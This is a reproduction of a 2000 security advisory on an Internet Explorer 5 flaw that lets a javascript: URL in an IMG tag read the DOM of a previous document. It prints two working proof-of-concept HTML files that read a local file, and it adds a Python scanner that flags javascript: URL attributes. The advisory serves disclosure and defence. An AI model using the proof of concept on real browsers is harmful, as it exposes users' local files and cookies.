Georgi Guninski security advisory #4, 2000

IE 5 security vulnerability - circumventing the Cross-frame security policy and accessing the DOM of "old" documents.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.01 under Windows 95 and 5.5 under WinNT 4.0 (other versions are probably also vulnerable) allow circumventing the "Cross frame security policy" by accessing the DOM of "old" documents using <IMG SRC="javascript:..."> and a design flaw in IE. This exposes the whole DOM of the target document and opens up many security risks.
This allows reading local files, reading files from any host, window spoofing, getting cookies, etc.

Details:
This is a strange exploit. If you open a new document in a window that contains an old document, the old document's DOM may be accessed by the new document until the new document is completely parsed and displayed. It looks like IE keeps the old document around until the new document is finally parsed and displayed. If you put an <IMG SRC="javascript:..."> in the new document, the script it contains has access to the old document's DOM.
Examine the source code for more info:

The code is:
-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------

----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file:   \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')">
</HTML>
---------------------------------------------------------------------
Demonstration is available at: http://www.guninski.com/img2main.html

Workaround: Disable Active Scripting
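The trigger described in the Details section is a URL attribute whose value uses the javascript: scheme (here SRC on an IMG). Until Active Scripting is disabled, a proxy or mail gateway can at least flag pages that carry such attributes. The following scanner is an added example and is not part of this advisory or any Microsoft code; it uses only the Python standard library, and the sample markup below is constructed for the example (the first IMG line is the advisory's own img2.html, the other lines are made up). It only inspects attributes, not the body of SCRIPT blocks, so the window.open() call in img2main.html would not be reported by it.

```python
import re
from html.parser import HTMLParser

# Attributes that take a URL and could therefore carry a javascript: scheme.
# The advisory uses SRC on IMG; the other names are common URL attributes
# of the same era (assumption: this list is illustrative, not exhaustive).
URL_ATTRS = {"src", "href", "lowsrc", "dynsrc", "background", "action", "data"}

# Tab, CR and LF are dropped from URLs by browsers before the scheme is
# parsed, so a detector must drop them too or it will miss the scheme.
_STRIPPED = re.compile(r"[\t\r\n]")


def normalise_url(value):
    """Return the URL as a browser would see it before scheme parsing."""
    if value is None:
        return ""
    cleaned = _STRIPPED.sub("", value)
    # Leading whitespace and control characters are ignored by browsers.
    return cleaned.lstrip(" \x00-\x1f").lower()


def is_script_url(value):
    """True if the attribute value resolves to the javascript: scheme."""
    return normalise_url(value).startswith("javascript:")


class ScriptUrlScanner(HTMLParser):
    """Collect (tag, attribute, raw value) for every javascript: URL attribute."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True: entities are decoded
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in URL_ATTRS and is_script_url(value):
                self.findings.append((tag.lower(), name.lower(), value))


def scan_html(markup):
    """Parse markup and return the list of javascript: URL attribute findings."""
    parser = ScriptUrlScanner()
    parser.feed(markup)
    parser.close()
    return parser.findings


def report(findings):
    """Render findings as one human-readable line each."""
    return [f"{tag} {attr}=\"{value[:60]}\"" for tag, attr, value in findings]


# Constructed sample: line 2 is the advisory's img2.html, the rest is filler.
SAMPLE_HTML = """<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\\'Here is your file:   \\'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')">
<img src="logo.gif" alt="plain image">
<a href="  JavaScript:void(0)">mixed-case scheme with leading spaces</a>
<a href="https://www.guninski.com/">normal link</a>
</HTML>"""


if __name__ == "__main__":
    for line in report(scan_html(SAMPLE_HTML)):
        print("javascript: URL attribute:", line)
```

Run as a script it prints one line for the IMG from img2.html and one for the mixed-case anchor, and nothing for the plain image or the https link. Pages that trip this check warrant inspection in a browser with scripting disabled, which is also the advisory's workaround.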

